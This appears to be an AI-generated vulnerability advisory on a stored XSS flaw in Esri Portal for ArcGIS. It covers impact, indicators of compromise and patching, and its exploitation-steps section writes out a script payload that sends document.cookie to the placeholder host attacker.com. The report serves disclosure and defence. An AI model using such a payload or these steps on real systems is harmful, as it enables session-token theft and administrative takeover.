CVE-2025-57876
Portal for ArcGIS vulnerability analysis and mitigation

Overview

CVE-2025-57876 is a stored Cross-Site Scripting (XSS) vulnerability in Esri Portal for ArcGIS versions 10.9.1 through 11.4 that allows a remote, authenticated attacker to inject a malicious file with an embedded XSS script. When a victim loads the compromised file, arbitrary JavaScript code may execute in their browser, potentially disclosing privileged authentication tokens and enabling full Portal takeover. The vulnerability was published on September 29, 2025, and carries a CVSS v3.1 base score of 4.8 (Medium), though the potential impact of token disclosure elevates its practical risk (Esri Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant (CAPEC-592). An authenticated attacker with high privileges can upload a malicious file containing embedded JavaScript to the Portal; when another user (such as an administrator) loads or previews that file, the script executes in their browser context without proper sanitization. Exploitation requires network access, high privileges, and victim interaction (user must load the malicious file), with no authentication bypass or complex chaining needed beyond the initial privileged account access (Esri Advisory).

Impact

Successful exploitation can result in the disclosure of privileged authentication tokens from the victim's browser session, which could allow the attacker to assume full administrative control of the Portal instance. While the CVSS scoring reflects low confidentiality and integrity impact in isolation, the real-world consequence of token theft — particularly from administrator accounts — represents a critical risk to the entire Portal environment, including all hosted geospatial data, user accounts, and connected services (Esri Advisory).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.033%, indicating a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for a high-privilege authenticated account and victim interaction, limiting opportunistic attack scenarios (Esri Advisory).

Exploitation steps

  1. Obtain high-privilege access: The attacker must first acquire credentials for a high-privilege account on the target Esri Portal for ArcGIS instance (e.g., through phishing, credential stuffing, or insider access).
  2. Craft malicious file: Prepare a file (e.g., an HTML, SVG, or supported Portal content file) containing an embedded XSS payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or a script targeting Portal session tokens.
  3. Upload to Portal: Use the authenticated session to upload the malicious file to a shared location within the Portal (e.g., a shared item, gallery, or content area accessible to other users).
  4. Induce victim interaction: Trick a privileged user (e.g., a Portal administrator) into loading or previewing the malicious file, via a shared link, notification, or social engineering.
  5. Capture token: When the victim's browser loads the file, the embedded JavaScript executes, exfiltrating the victim's session token or authentication cookie to an attacker-controlled server.
  6. Assume Portal control: Use the captured privileged token to authenticate to the Portal as the victim, gaining full administrative access (Esri Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from a Portal user's browser to external or unknown domains immediately after accessing Portal content; unusual GET/POST requests containing encoded cookie or token data to non-Esri endpoints.
  • Logs: Portal access logs showing a high-privilege account uploading new files (especially HTML, SVG, or script-capable formats) shortly before another privileged user accesses the same content; authentication events from unexpected IP addresses following file access events.
  • File System: Presence of unexpected files with embedded <script> tags or JavaScript payloads in Portal content directories or shared item storage.
  • Behavioral: Privileged Portal sessions originating from IP addresses inconsistent with the legitimate account owner's history, particularly following file-load events by administrator accounts.

Mitigation and workarounds

Esri has released a patch addressing this vulnerability in the "Portal for ArcGIS Security 2025 Update 3" patch. Organizations running versions 10.9.1 through 11.4 (including all intermediate security updates) should apply this patch immediately. As interim mitigations, restrict file upload and content publishing privileges to the minimum necessary set of trusted users, implement a Content Security Policy (CSP) on the Portal to limit script execution, and monitor Portal activity logs for suspicious file uploads by high-privilege accounts (Esri Advisory).

Additional resources


SourceThis report was generated using AI

Related Portal for ArcGIS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-69236MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69235MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69234MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69237LOW3.8
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69238LOW3.5
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management